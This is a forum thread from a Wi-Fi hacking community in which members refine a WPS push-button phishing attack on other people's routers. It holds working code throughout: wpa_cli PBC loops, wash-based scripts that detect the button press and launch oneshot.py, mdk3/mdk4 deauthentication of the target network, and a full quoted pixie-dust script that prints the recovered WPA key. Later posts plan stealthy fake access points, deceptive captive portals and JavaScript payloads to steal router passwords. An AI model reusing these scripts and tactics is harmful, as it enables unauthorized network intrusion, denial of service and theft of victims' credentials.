A possible improvement to the WPS PBC hack

mooooon · 22-01-2022 02:31:26

Instead of

wpacli = Thread.new do
  while true
    system "xterm -e wpa_cli wps_pbc #{$apmac}"   
    sleep(120)
  end
end

We use the wifiphisher method that Checks if the pbc button is being pressed or not without trying to connect

        while isinstance(elt_section, dot11.Dot11Elt):
            # check if WPS IE exists
            if elt_section.ID == 221 and\
                    elt_section.info.startswith("\x00P\xf2\x04"):

That way we won't need to stop the AP deauth at all

@Kcdtv what do you think ?

Also

There is no need for this

Kcdtv escribió:

Se levanta para llegar al router y activar el WPS PBC
Luego vuelve a su silla para prensar en el botón del dongle que hace de victma.
Cuando se sienta otra vez es tarde: el ordenador "atacante" ya esta conectado y prensar el botón desde la victima no sirve de nada.

and this too

Kcdtv escribió:

Lo importante es llegar primero, si la petición de conexión del intruso se recibe antes que la del cliente legitimo, el intruso se conecta a nuestra a red y obtiene la llave WPA.
La vulnerabilidad se basa en el intervalo de tiempo necesario a un humano para prensar un botón.
Es a la vez muy simple y implacable: Una maquina que manda peticiones en bucle será siempre más rápida que un humano.

As pixiewps supports -7 option

This option requires the attribute encrypted settings found in M7 when the Registrar proved knowledge of the PIN, and the Access Points, the Enrollee, sends its current network configuration.
This feature can be used to crack the WPA-PSK (and WPS PIN) from a passive packet capture (e.g. sniffing a PBC session).

Source :

there's currently no code in wash or similar tools to know whether the button was pushed.
you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d3 … 672e706e67 from wireshark.

which means it can extract the password by just airodump-ng on a network while someone connect to it using the PBC method

That way , There is no need to be the first or anything

what do you think , is it worth a post update ?

Thanks

Ultima edición por mooooon (22-01-2022 02:32:38)

Koala · 22-01-2022 18:06:34

I saw that wps_pbc method is becoming a real interess, i enjoy it smile

You take my old code in ruby but you don't specify wich code mentioned above is

For all to avoid misunderstanding : this code it's not a ruby code like the first but a python code from wifiphisher.

That way we won't need to stop the AP deauth at all

You have to take care because sometimes if the router has been deauthed for a while, the wps_pbc connect will not work.For this reason i stop the deauth only when a client is coming to the fake AP, like that the original router has a time to wake up while the victim see the fake page and more chance to get the wps_pbc connect.

Ultima edición por Koala (22-01-2022 18:12:53)

mooooon · 22-01-2022 18:56:11

Koala escribió:

I saw that wps_pbc method is becoming a real interess, i enjoy it

Glad that you do wink

You take my old code in ruby but you don't specify wich code mentioned above is

The code is from here

https://www.wifi-libre.com/topic-596-vu … html#p9291

For all to avoid misunderstanding : this code it's not a ruby code like the first but a python code from wifiphisher.

That way we won't need to stop the AP deauth at all

You have to take care because sometimes if the router has been deauthed for a while, the wps_pbc connect will not work.For this reason i stop the deauth only when a client is coming to the fake AP, like that the original router has a time to wake up while the victim see the fake page and more chance to get the wps_pbc connect.

The problem with this , that not all networks has win10 devices connected to them
which means we have to set the network to open
which means that any device would connect to it
not just the target devices
that way we can't count on the connection of the device to our fake AP To determine if we should stop the deauth or not

Also mdk4 has a client whitelist option if that helps

instead of disconnecting all the clients...we disconnect all the clients expect one (ours) the
so we no longer need the stop the DoS attacks when the user connects to fake AP

Check my last reply the one before this about Pixiewps too !

Koala escribió:

I saw that wps_pbc method is becoming a real interess, i enjoy it

You take my old code in ruby but you don't specify wich code mentioned above is

For all to avoid misunderstanding : this code it's not a ruby code like the first but a python code from wifiphisher.

That way we won't need to stop the AP deauth at all

You have to take care because sometimes if the router has been deauthed for a while, the wps_pbc connect will not work.For this reason i stop the deauth only when a client is coming to the fake AP, like that the original router has a time to wake up while the victim see the fake page and more chance to get the wps_pbc connect.

Hey i tested the tool once again but

the deauth doesn't support channel hopping

which means it doesn't follow channel change

so the deauth is useless !

Thanks

I think maybe it can be done using the waircut method

mooooon escribió:

We use the wifiphisher method that Checks if the pbc button is being pressed or not without trying to connect
Thanks

or using this

wps2key.py

https://github.com/Tourountzis/wifi-pwn … wps2key.py

Ultima edición por mooooon (22-01-2022 18:59:35)

kcdtv · 24-01-2022 14:54:33

Hi!

which means it can extract the password by just airodump-ng on a network while someone connect to it using the PBC method
That way , There is no need to be the first or anything

Carefull! This pixiewps mode only works with supported realtek chipsets (mode 3)

   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)

If that is the case it indeed makes things easier,

Also, there are no "different methods" to detect the state of the WPS registar, All tools scan and check the PROBE packets. No monitor mode is required for that.

mooooon · 25-01-2022 18:17:54

Hello Kcdtv

Acutally there is
by using the loop

wpacli = Thread.new do
  while true
    system "xterm -e wpa_cli wps_pbc #{$apmac}"   
    sleep(120)
  end
end

Also , what method does Hostbase use ?

I tried to use this , but it results in false Positives.

#!/bin/bash
if timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_selected_registrar"; then
   echo Pushed
else 
   echo NotPushed 
fi

Thanks

kcdtv · 26-01-2022 11:12:48

Two different things here:
- The while loop (ruby) is to send (through wpa_cli) a PBC connection request
- The if condition (bash) is to scan the devices (through wash)
The "method" is to send the PBC request trough wpa_cli in both cases.

Koala · 26-01-2022 18:18:10

More details about the ruby code used in hostbase, i commented it for you:

wpacli = Thread.new do # here we create a new thread called "wpacli", we can execute it on the background and it is more efficient than get a lot of windows on the same screen
  while true  # the begining of the loop
    system "xterm -e wpa_cli wps_pbc #{$apmac}"  # the command that will be execute by the thread, wpa_cli command to launch every 120 seconds
    sleep(120)  # the time before the loop will repeat.
  end
end  # the end of the loop

In my oldest version of hostbase the bash code is the following:

while : ; do
        xterm -e wpa_cli wps_pbc ${BSSID} ; sleep 120 ; done &
       echo $! >/tmp/wpacliactu.pid

The bash code above do exactly the same thing as the ruby code i explained.Don't forget to kill the pid generated by wpa_cli

Before to go testing some tools, i strongly recommend you to understand how works wpa_cli.

Also wpa_cli as a interactive command line to do every things you want to do cool

Ultima edición por Koala (26-01-2022 18:23:40)

mooooon · 26-01-2022 19:31:38

kcdtv escribió:

Two different things here:
- The while loop (python) is to send (through wpa_cli) a PBC connection request

But that isn't a good idea when mdk3 is deauthing the target network!

- The if condition (bash) is to scan the devices (through wash)

this option is better ,That way we can send a connection request only if the PBC is activated ! , So mdk3 won't be an Issue when checking , we kill it after we detect the button pushed in probe requests

The "method" is to send the PBC request trough wpa_cli in both cases.

Nah the Wpa_cli is trouble some , i recommend using the OneShot Python Script , It's easier to use and prints the password automatically

Start WPS push button connection:
sudo python3 oneshot.py -i wlan0mon --pbc

so we use it like this

import subprocess, sys
import os
argv = list(sys.argv)
argv[0] = 'wash'
proc = subprocess.Popen(argv, executable=argv[0], stdout=subprocess.PIPE)
while 1:
        line = proc.stdout.readline()
        if line == '': break
        print line
        if '"wps_device_password_id" : "0004"' in line:
	        proc.terminate()
                os.system("sudo python3 /root/OneShot-master/oneshot.py -i wlan0mon --pbc")
                break
#Usage : washwrapper.py -j -i wlan0mon -c 6 -b XX:XX:XX:XX:XX:XX

Koala escribió:

More details about the ruby code used in hostbase, i commented it for you:

wpacli = Thread.new do # here we create a new thread called "wpacli", we can execute it on the background and it is more efficient than get a lot of windows on the same screen
  while true  # the begining of the loop
    system "xterm -e wpa_cli wps_pbc #{$apmac}"  # the command that will be execute by the thread, wpa_cli command to launch every 120 seconds
    sleep(120)  # the time before the loop will repeat.
  end
end  # the end of the loop

oh thanks a lot for commenting it for me , But again the same as i replied to kcdtv , it's not efficient to use wpa_cli wps_pbc with mdk3 as we would have to use only one of them at a time but not
both ! , And the fact that wpa_cli wps_pbc would result in Fixed channel error While we can easily use mdk3 + wash , cause wash wouldn't have to try to connect to check if the button was pushed or not but monitor the traffic passively and we can specify the channel in wash , that way we won't get the fixed channel error

In my oldest version of hostbase the bash code is the following:
while : ; do
        xterm -e wpa_cli wps_pbc ${BSSID} ; sleep 120 ; done &
       echo $! >/tmp/wpacliactu.pid
The bash code above do exactly the same thing as the ruby code i explained.Don't forget to kill the pid generated by wpa_cli

Before to go testing some tools, i strongly recommend you to understand how works wpa_cli.

Also wpa_cli as a interactive command line to do every things you want to do

I still don't understand why would you use wpa cli to check if the button was pushed or not while it's stated in the Wi-Fi Protected Setup Specification @Patcher linked me to it , and told me that he uses that method with waircut PBC option

The AP informs Enrollees that the Selected Registrar is in PBC mode using Probe Response messages
The Enrollee performs this scan by sending out probe requests with a Device Password ID indicating that the Enrollee is in PBC mode and receiving probe responses indicating a Selected Registrar with a PBC Device Password ID.
When an AP receives a Selected Registrar and Device Password ID indicating PBC mode from a Registrar, it MUST automatically remove this information and no longer include it in probe responses after an interval of Walk Time has elapsed.Before the Registrar’s button is pushed, the AP shall not advertise any active PBC state

And from another WPS documentation titled : Wireless LAN PCI Card User Manual V1.1

Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.

That way using

timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

is more than enough to check if the button was pushed or not

I also tested the latest hostbase wifislax version

And the channel hopping wasn't working at all !

How it's supposed to be able to check the channel change while it's running wpa_cli wps_pbc whenever it's not deauthing using mdk3 !

Also the thing that the latest version would only work if the target network Has A laptop connected to it .. IS so annoying .... Like the most of the networks has mobile phones only connected to them and rarely there is any laptop !

Also if the target network had A laptop on it it would be super EASY to hack the network with No Phishing at all !
Using this method

Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning

I also like to add that the whole hostbase wps Phishing attack can be done using only a single adapter !

We launch the Fake AP on the same channel as the original network

We run MDK4 -b target mac -c channel

We run the wash | grep -q "wps_device_password_id" , if the button was pushed then we kill everything and use oneshot to connect

Run something like airodump-ng on target AP with the channel it already found , to monitor for channel change

Then if airodump-ng can no longer detect/find the AP on that channel then it kills mdk4 and the fake AP & wash and then starts looking for the AP on other channels

And after finding the new channel , It restarts mdk4 & Fake AP & wash with the new channel provided to it as an argument

then airodump-ng starts monitoring the target on that channel again , to look for possible channel change

As a bonus now the Fake AP is stealthy and won't get the user suspicious when He shutdowns the Routers and still see the Fake AP network not disappearing

What do you think ?

kcdtv · 27-01-2022 16:38:37

Nah the Wpa_cli is trouble some , i recommend using the OneShot Python Script , It's easier to use and prints the password automatically

Na tú big_smile
oneshot,py (creación original del compañero - y miembro de nuestro foro - r0flor) es un "wrapper" (envoltorio) para wpa_supplicant y su linea de ordenes interactiva (cli) wpa_cli,

Se basa enteramente en wpa_supplicant(wpa_cli
- creación del fichero de configuración para wpa_supplicant:

 self.tempdir = tempfile.mkdtemp()
        with tempfile.NamedTemporaryFile(mode='w', suffix='.conf', delete=False) as temp:
            temp.write('ctrl_interface={}\nctrl_interface_group=root\nupdate_config=1\n'.format(self.tempdir))
            self.tempconf = temp.name
        self.wpas_ctrl_path = f"{self.tempdir}/{interface}"
        self.__init_wpa_supplicant()

- lanzamiento de wpa_supplicant

    def __init_wpa_supplicant(self):
        print('[*] Running wpa_supplicant…')
        cmd = 'wpa_supplicant -K -d -Dnl80211,wext,hostapd,wired -i{} -c{}'.format(self.interface, self.tempconf)
        self.wpas = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')
        # Waiting for wpa_supplicant control interface initialization

Y es que todos los mensajes en salida te hablan de wpa_supplicant...

    def _explain_wpas_not_ok_status(command: str, respond: str):
        if command.startswith(('WPS_REG', 'WPS_PBC')):
            if respond == 'UNKNOWN COMMAND':
                return ('[!] It looks like your wpa_supplicant is compiled without WPS protocol support. '
                        'Please build wpa_supplicant with WPS support ("CONFIG_WPS=y")')
        return '[!] Something went wrong — check out debug log'

Wpa_cli is no troubles, Wpa_cli is the way. big_smile
Quieres ir más rápido que la música... Si lo que pretendes es investigar y sofisticar algo, primero has de entender al cien por cien lo que haces,
Y esto no lo lograrás usando script de terceros, lo lograrás haciendo las cosas a mano...
Por ejemplo el ataque pixiedust que hace oneshot.py no es otra cosa que automatizar un par de comandos y depurar una salida con expresiones regulares: Método universal para realizar un ataque pixie dust (sin modo monitor)
Y verás que el tema hablamos justamente de oneshotpin...

kcdtv escribió:

R0flor ha dejado un script en python (oneshotpin.py)en el repositorio de reaver:

#!/usr/bin/env python2

import sys, subprocess, os, tempfile, shutil

class Data():
	def __init__(self):
		self.pke = ''
		self.pkr = ''
		self.e_hash1 = ''
		self.e_hash2 = ''
		self.authkey = ''
		self.e_nonce = ''
		self.wpa_psk = ''
		self.state = ''

class Options():
	def __init__(self):
		self.interface = None
		self.bssid = None
		self.pin = None
		self.pixiemode = False
		self.verbose = False
		self.showpixiecmd = False

def shellcmd(cmd):
	proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
	result = proc.read()
	proc.wait()
	return result

def run_wpa_supplicant(options):
	options.tempdir = tempfile.mkdtemp()
	with tempfile.NamedTemporaryFile(suffix='.conf', delete=False) as temp:
		temp.write("ctrl_interface=%s\nctrl_interface_group=root\nupdate_config=1\n"%(options.tempdir))
		options.tempconf=temp.name
	cmd = 'wpa_supplicant -K -d -Dnl80211,wext,hostapd,wired -i%s -c%s'%(options.interface, options.tempconf)
	proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
	return proc

def run_wpa_cli(options):
	cmd = 'wpa_cli -i%s -p%s'%(options.interface, options.tempdir)
	proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
	return proc

def recvuntil(pipe, what):
	s = ''
	while True:
		inp = pipe.stdout.read(1)
		if inp == '': return s
		s += inp
		if what in s: return s

def got_all_pixie_data(data):
	return data.pke and data.pkr and data.e_nonce and data.authkey and data.e_hash1 and data.e_hash2

def statechange(data, old, new):
	print '%s -> %s'%(old, new)
	data.state = new
	return True

def process_wpa_supplicant(pipe, options, data):
	def get_hex(line):
		a = line.split(':', 3)
		return a[2].replace(' ', '')

	line = pipe.stdout.readline()
	if line == '':
		pipe.wait()
		return False
	line = line.rstrip('\n')

	if options.verbose: sys.stderr.write(line + '\n')

	if line.startswith('WPS: '):
		if 'Enrollee Nonce' in line and 'hexdump' in line:
			data.e_nonce = get_hex(line)
			assert(len(data.e_nonce) == 16*2)
		elif 'DH own Public Key' in line and 'hexdump' in line:
			data.pkr = get_hex(line)
			assert(len(data.pkr) == 192*2)
		elif 'DH peer Public Key' in line and 'hexdump' in line:
			data.pke = get_hex(line)
			assert(len(data.pke) == 192*2)
		elif 'AuthKey' in line and 'hexdump' in line:
			data.authkey = get_hex(line)
			assert(len(data.authkey) == 32*2)
		elif 'E-Hash1' in line and 'hexdump' in line:
			data.e_hash1 = get_hex(line)
			assert(len(data.e_hash1) == 32*2)
		elif 'E-Hash2' in line and 'hexdump' in line:
			data.e_hash2 = get_hex(line)
			assert(len(data.e_hash2) == 32*2)
		elif 'Network Key' in line and 'hexdump' in line:
			data.wpa_psk = get_hex(line).decode('hex')
		elif 'Building Message M' in line:
			statechange(data, data.state, 'M' + line.split('Building Message M')[1])
		elif 'Received M' in line:
			statechange(data, data.state, 'M' + line.split('Received M')[1])

	elif ': State: ' in line:
		statechange(data, *line.split(': State: ')[1].split(' -> '))
	elif 'WPS-FAIL' in line:
		print "WPS-FAIL :("
		return False

	elif 'NL80211_CMD_DEL_STATION' in line:
		#if data.state == 'ASSOCIATED':
		#	print "URGH"
		print "[ERROR]: unexpected interference - kill NetworkManager/wpa_supplicant!"
		#return False
	elif 'Trying to authenticate with' in line:
		print line
	elif 'Authentication response' in line:
		print line
	elif 'Trying to associate with' in line:
		print line
	elif 'Associated with' in line:
		print line
	elif 'EAPOL: txStart' in line:
		print line

	return True

def die(msg):
	sys.stderr.write(msg + '\n')
	sys.exit(1)

def usage():
	die( \
"""
oneshotpin 0.0.2 (c) 2017 rofl0r

Required Arguments:
	-i, --interface=<wlan0>  Name of the interface to use
	-b, --bssid=<mac>        BSSID of the target AP

Optional Arguments:
	-p, --pin=<wps pin>      Use the specified pin (arbitrary string or 4/8 digit pin)
	-K, --pixie-dust         Run pixiedust attack
	-X                       Alway print pixiewps command
	-v                       Verbose output

Example:
	%s -i wlan0 -b 00:90:4C:C1:AC:21 -p 12345670 -K
""" % sys.argv[0])

def get_pixie_cmd(data):
	return "pixiewps --pke %s --pkr %s --e-hash1 %s --e-hash2 %s --authkey %s --e-nonce %s" % \
		(data.pke, data.pkr, data.e_hash1, data.e_hash2, data.authkey, data.e_nonce)

def cleanup(wpas, wpac, options):
	wpac.stdin.write('terminate\nquit\n')
	wpas.terminate()
	wpac.terminate()
	shutil.rmtree(options.tempdir, ignore_errors=True)
	os.remove(options.tempconf)

if __name__ == '__main__':
	options = Options()

	import getopt
	optlist, args = getopt.getopt(sys.argv[1:], ":e:i:b:p:XKv", ["help", "interface", "bssid", "pin", "pixie-dust"])
	for a,b in optlist:
		if   a in ('-i', "--interface"): options.interface = b
		elif a in ('-b', "--bssid"): options.bssid = b
		elif a in ('-p', "--pin"): options.pin = b
		elif a in ('-K', "--pixie-dust"): options.pixiemode = True
		elif a in ('-X'): options.showpixiecmd = True
		elif a in ('-v'): options.verbose = True
		elif a == '--help': usage()
	if not options.interface or not options.bssid:
		die("missing required argument! (use --help for usage)")
	if options.pin == None and not options.pixiemode:
		die("you need to supply a pin or enable pixiemode! (use --help for usage)")
	if options.pin == None and options.pixiemode:
		options.pin = '12345670'

	if os.getuid() != 0:
		die("oops, try as root")

	data = Data()
	wpas = run_wpa_supplicant(options)
	while True:
		s = recvuntil(wpas, '\n')
		if options.verbose: sys.stderr.write(s)
		if 'update_config=1' in s: break

	wpac = run_wpa_cli(options)
	recvuntil(wpac, '\n> ')
	wpac.stdin.write('wps_reg %s %s\n' % (options.bssid, options.pin))
#	while True:
#		sys.stderr.write( wpac.stdout.read(1) )
	recvuntil(wpac, 'OK')

	pixiecmd = None

	while True:
		try:
			res = process_wpa_supplicant(wpas, options, data)
		except KeyboardInterrupt:
			print "aborting..."
			res = False

		if not res: break

		if got_all_pixie_data(data):
			pixiecmd = get_pixie_cmd(data)

		if options.pixiemode and pixiecmd:
			cleanup(wpas, wpac, options)
			print "running %s" % pixiecmd
			os.execlp('/bin/sh', '/bin/sh', '-c', pixiecmd)
			# shouldnt get here
			sys.exit(1)

		if data.wpa_psk:
			if options.showpixiecmd and pixiecmd: print pixiecmd
			cleanup(wpas, wpac, options)
			print "!!! GOT WPA KEY !!!: %s" % data.wpa_psk
			sys.exit(0)

	print "hmm, seems something went wrong..."
	if options.showpixiecmd and pixiecmd: print pixiecmd
	cleanup(wpas, wpac, options)
	sys.exit(1)

ver: timout errors #175
Los "comandos" a ejecutar son dos.
Una vez la interfaz seleccionada con tu sistema de menú y el "fichero" (tres lineas, incluso una) *.conf puesto en un sitio debes:
1. Iniciar wpa_supplicant en modo --debugg indicando el fichero de configuración. Debes mandar el proceso en background y "vigilar" la salida (que duplicas). Con bash no hay "multi threading" (mejor con python para esto) así que debes apañarte con el truco que te parezca.

wpa_supplicant -i <interfaz> -c /ruta/fichero/*conf -K -B

-K para el debug y -B para manadr el proceso en background
2. Mandar un PIN

wpa_cli -i <Interfaz> wps_reg <Bssid> <PIN>

Luego recoger las cadenas y hacer la linea pixedust,
He hecho un script para hacer conexión PBC con wpa_cli y es casi el mismo proceso (no hay lo de recoger las cadenas pero es lo de menos) salvo que mando una petcicón PBC en lugar de mandar un PIN.
cada paso esta descrito en consola, asi que tienes la descripción de cada maniobra:

cho -e "$white▐█$purpple   Shutting down network manager$nocolour (wifi connexion will be lost)"
systemctl stop network-manager
echo -e "$white▐█$purpple   Killing conflictual process$nocolour"
killall wpa_supplicant dhclient 2>/dev/null
echo -e "$white▐█$purpple   Soft block control$nocolour"
rfkill unblock wifi
echo -e "$white▐█$purpple   Managed mode control$nocolour"
ip link set "$interface" down
iwconfig "$interface" mode managed
ip link set "$interface" up
echo -e "$white▐█$purpple   Creation of wpa_supplicant configuration file$nocolour" 
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> /tmp/PBC.conf
echo -e "$white▐█$purpple   Launching wpa-supplicant$nocolour"
wpa_supplicant -c /tmp/PBC.conf -i "$interface" -B

Aquí está: PBC.sh
Uso iwconfig para seleccionar la interfaz y hubiera sido mejor hacer lo con iw (iwconfig está "abandonado", iw no lo está)
Una forma de hacerlo... Todo está en la gestión de los procesos que mandas en background.

mooooon · 27-01-2022 19:38:58

kcdtv escribió:

Nah the Wpa_cli is trouble some , i recommend using the OneShot Python Script , It's easier to use and prints the password automatically
Na tú
oneshot,py (creación original del compañero - y miembro de nuestro foro - r0flor) es un "wrapper" (envoltorio) para wpa_supplicant y su linea de ordenes interactiva (cli) wpa_cli,
https://www.wifi-libre.com/img/members/3/oneshot_1.jpg

Oh boy ! looks like i missed a lot haha

but to be honest the original from rofl0r doesn't have nor support PBC

only the one from drygdryg does.

And still oneshot is quicker than doing it the manual way

I would have used kcdtv/PBC But the problem is that ... it does it on all channels

While i want it to only scan on a single channel and procced to try to connect only if the PBC press has been detected in monitor mode without network manager , This way it can be used beside other attacks like the hostbase

so this would be a better method , It's better than the method hostbase USEs ! that's why i came here and made this post
hostbase method would make it trouble some to have mdk3 and Rogue AP using only two adapters
while supporting channel hopping for mdk3
as how will wpa_cli wps_pbc detect if the button was pushed or not without stopping mdk3 ?
we have to able to have an indicator that tells if the button was pushed or not by just monitoring Passively, This way we can do the whole attack
With only two or one adapters without needing to stop mdk3 for more than 5 seconds
And this the exact opposite of what hostbase does

#!/bin/bash
wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8   > file.txt &
PIDOFWASH=$!
until grep -q '"wps_device_password_id" : "0004"' file.txt;
do
sleep 1;
done;
echo found
kill ${PIDOFWASH}
sleep 2
sudo python3 /root/OneShot-master/oneshot.py -i wlan0mon --pbc

I am looking for way to join the script above
with mdk3 with channel hopping + Fake AP
only using two adapters

do you know how ?

looks like i came late into the scene

also is there way to do wpa_cli wps_pbc in monitor mode ?

I suggested to rofl0r to add it to Reaver issue num 107 before i opened that issue Wash wasn't able to detect if the button has been pushed or not.They just added showing wps_device_password_id in the Json mode of wash

I am the one who suggested PBC phishing to wifiphisher years ago but it doesn't actually work haha

I am currently looking for a way to pull Evil twin with channel hopping + PBC Using only a Single adapter

Also how does wpa_cli wps_pbc work ? does it work the same way as

timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

or ... ?

Koala · 27-01-2022 19:56:47

Two different things here:
- The while loop (python) is to send (through wpa_cli) a PBC connection request
But that isn't a good idea when mdk3 is deauthing the target network!

For this reason we have to stop mdk3/4 before make a pbc request on the AP when a client connect to the fake AP.Like i said before if you stop mdk3/4 just when the pbc is alive on the AP, you will get some troubles to get the wps access because not all APs act by the same way and the deauth with mdk3/4 is very powerfull and can crash an AP for a while.

I still don't understand why would you use wpa cli to check if the button was pushed or not while it's stated in the Wi-Fi Protected Setup Specification @Patcher linked me to it , and told me that he uses that method with waircut PBC option

Anyway, if you don't go with wpa_cli i think it is a big mistake and like Kcdtv said "wpa_cli is the way" wink

also tested the latest hostbase wifislax version
And the channel hopping wasn't working at all !
How it's supposed to be able to check the channel change while it's running wpa_cli wps_pbc whenever it's not deauthing using mdk3 !
Also the thing that the latest version would only work if the target network Has A laptop connected to it .. IS so annoying .... Like the most of the networks has mobile phones only connected to them and rarely there is any laptop !

-1 The version of hostbase for wifislax is completely outdated.Since this time i maked a lot of change to improve channel hopping and it work's fine now.
-2 You are confused here.Wps_pbc work only when the fake ap with wpa encryption is launched to let the victim connect to us then when a client connect to the fake AP the deauth stop and wps_pbc again the target AP beging

also like to add that the whole hostbase wps Phishing attack can be done using only a single adapter !
We launch the Fake AP on the same channel as the original network
We run MDK4 -b target mac -c channel
We run the wash | grep -q "wps_device_password_id" , if the button was pushed then we kill everything and use oneshot to connect
Run something like airodump-ng on target AP with the channel it already found , to monitor for channel change
Then if airodump-ng can no longer detect/find the AP on that channel then it kills mdk4 and the fake AP & wash and then starts looking for the AP on other channels
And after finding the new channel , It restarts mdk4 & Fake AP & wash with the new channel provided to it as an argument
then airodump-ng starts monitoring the target on that channel again , to look for possible channel change
As a bonus now the Fake AP is stealthy and won't get the user suspicious when He shutdowns the Routers and still see the Fake AP network not disappearing
What do you think ?

-1 The hostbase wps phishing attack can be done with one adapter only if the target AP is on 2.4GHz frequency .Now in 2022 a lot of AP 's have two frequencies, one in 2.4GHz and one 5GHz.We can't do a good deauth in both frequencies with the same adapter so we need 2 adapter at least.In my personal experience i use 3 adapter one for the fake AP, second for the deauth in 24GHz frequency and the third for the deauth on 5GHz frequency.

-2 In my ownm experience (i like to spend my time to test some things big_smile ) you can't launch the fake AP on the same channel as the real AP because if you want to do an efficiant deauth, the channel of the fake AP wich is on the same channel of the real AP will be saturate at the same time and the victim can't join the fake AP.

-3 The best to test channel hopping is wash, i was using airodump-ng before but finaly i use wash.Also we don't need to restart the fake AP at all, trust me the users in the majority of the cases don't shutdown their AP's.

In your previous post you mentionned that:

The problem with this , that not all networks has win10 devices connected to them
which means we have to set the network to open
which means that any device would connect to it
not just the target devices
that way we can't count on the connection of the device to our fake AP To determine if we should stop the deauth or not
Also mdk4 has a client whitelist option if that helps

Im working on the next version of hostbase but i have few time to maintain my project...I agree with you but put the networks open mean we have to take care of who is connect to it.For this reason i maked a MAC filters directly through hostapd and if two clients are connected the deauth stop and we send wps_pbs to the target AP.

mac filter

To resume from what i see you have good ideas but you need to test yourself in a terminal all things you want to do before to go with hostbase or wifiphisher.... cool

mooooon · 27-01-2022 21:02:48

Koala escribió:

For this reason we have to stop mdk3/4 before make a pbc request on the AP when a client connect to the fake AP.Like i said before if you stop mdk3/4 just when the pbc is alive on the AP, you will get some troubles to get the wps access because not all APs act by the same way and the deauth with mdk3/4 is very powerfull and can crash an AP for a while.

Hmm , I didn't experience Any AP crashing because of mdk3/4 ... and lets say that it would crash ... would the crash last for the whole 120 seconds ?

Even if that's the case ...Checking the pbc button was pushed or not using the wpa cli is trouble some as we are already in monitor mode while wpa cli works in managed
And then if we try channel hopping , it would be much much complicated for no reason cause the wpa cli would be running checking for the push of the button in the background
making the mdk3 not possible.
Also this way we leave a window for the client target to reconnect back to their network
That way The attack becomes less effective

Anyway, if you don't go with wpa_cli i think it is a big mistake and like Kcdtv said "wpa_cli is the way"

haha maybe , but i am looking for a new way to do it using monitor mode

-1 The version of hostbase for wifislax is completely outdated.Since this time i maked a lot of change to improve channel hopping and it work's fine now.
-2 You are confused here.Wps_pbc work only when the fake ap with wpa encryption is launched to let the victim connect to us then when a client connect to the fake AP the deauth stop and wps_pbc again the target AP beging

Hmm so .. Can i use the latest version of hostbase that's not for wifislax on wifislax or not ?
Also how did you get the channel hopping to work using only two adapters .... Can you explain the logic you used ?

Also again about the "the fake ap with wpa encryption" if we go this Road then Using the

Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning

is much much effective

SO ..... The deauth stops when the client connects to us ... right ?
Then what if the client disconnects ?
or what if the channel changes while he connected to us
How will the mdk3 start again after the 10 minutes has passed ?

-1 The hostbase wps phishing attack can be done with one adapter only if the target AP is on 2.4GHz frequency .Now in 2022 a lot of AP 's have two frequencies, one in 2.4GHz and one 5GHz.We can't do a good deauth in both frequencies with the same adapter so we need 2 adapter at least.In my personal experience i use 3 adapter one for the fake AP, second for the deauth in 24GHz frequency and the third for the deauth on 5GHz frequency.

-2 In my ownm experience (i like to spend my time to test some things ) you can't launch the fake AP on the same channel as the real AP because if you want to do an efficiant deauth, the channel of the fake AP wich is on the same channel of the real AP will be saturate at the same time and the victim can't join the fake AP.

-3 The best to test channel hopping is wash, i was using airodump-ng before but finaly i use wash.Also we don't need to restart the fake AP at all, trust me the users in the majority of the cases don't shutdown their AP's.

1. So.... IF the network is 2.4GHz only ... Can The hostbase wps phishing attack can be done with one adapter + channel hopping ?

2. Why ? Every single Evil twin tool/script out there launches the fake AP on the same channel as the real AP with no problem what so ever
Check Airegddon/Fluxion/Wifiphisher

3. How wash is better ? And i didn't say shutdown but restart .... when they restart their AP they expect the network to disappear from the networks list for a while then appear again ... but whenn
they see that the network is still there , they will know that something is wrong and the wifi isn't coming from their Router!

In your previous post you mentionned that:

The problem with this , that not all networks has win10 devices connected to them
which means we have to set the network to open
which means that any device would connect to it
not just the target devices
that way we can't count on the connection of the device to our fake AP To determine if we should stop the deauth or not
Also mdk4 has a client whitelist option if that helps

Im working on the next version of hostbase but i have few time to maintain my project...I agree with you but put the networks open mean we have to take care of who is connect to it.For this reason i maked a MAC filters directly through hostapd and if two clients are connected the deauth stop and we send wps_pbs to the target AP.

https://zupimages.net/up/22/04/buaw.png

That would have been useful before 2018 before android and IOS added MAC Address Randomization by default and windows too ... now it's pretty useless so....

To resume from what i see you have good ideas but you need to test yourself in a terminal all things you want to do before to go with hostbase or wifiphisher....

Haha Thanks

And you haven't even seen this list. where i mentioned the most crazy wifi hacking ideas in existence I could think of
. That most one i like of them is the WIFI Manager phishing page
where we create a wifi manager captive portal
Based on the user agent of the connected device

This way they get fooled and think that they are still in the password entering place , Even that they are in the captive portal
ex. for Samsung

Also me and a friend where planning on Creating a full blown
Evil twin project that exploits the Routers of the targets instead
By making them disconnect as soon as the captive portal page loads ... so this way they connect back to their network with the page still open which in turn Logins to the router and sends Us the password back

And we were designing it to make it to work in a general way on most of the routers using Iframes and google auto fill input bars trick unlike dribble which works for certain Router only and needs the user to visit a http page
But we stopped since we needed help working on it

Also about the last part of my last post

You can get the exact Router model from WPS or using Fing wifi scanner app or the 3wifi model detection option

or even make the attack on two parts one for grabbing the page and sending it back to us for the purpose of detecting which model it's

and the second is to make a new page with JS payload that fits the router model to exploit it using some bug or default login!

